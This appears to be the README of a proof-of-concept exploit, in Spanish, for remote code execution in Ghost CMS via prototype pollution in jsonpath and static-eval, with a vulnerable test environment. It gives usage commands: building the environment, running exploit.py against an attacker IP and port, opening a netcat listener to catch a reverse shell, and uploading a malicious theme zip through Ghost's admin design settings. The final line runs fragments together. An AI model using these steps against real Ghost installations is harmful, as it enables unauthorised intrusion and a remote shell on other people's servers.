
Prueba de concepto de explotación para la ejecución remota de código en Ghost CMS mediante contaminación de prototipos en jsonpath y static-eval, con un entorno vulnerable configurado e instrucciones de uso.
RCE en Ghost CMS mediante la cadena de prototipos jsonpath/static-eval.
cd build
./build.sh
python3 exploit.py -i <YOUR_IP> -p <PORT>
nc -lvnp <PORT>malicious-theme.zip a Ghost Admin → Settings → Designrce/rce/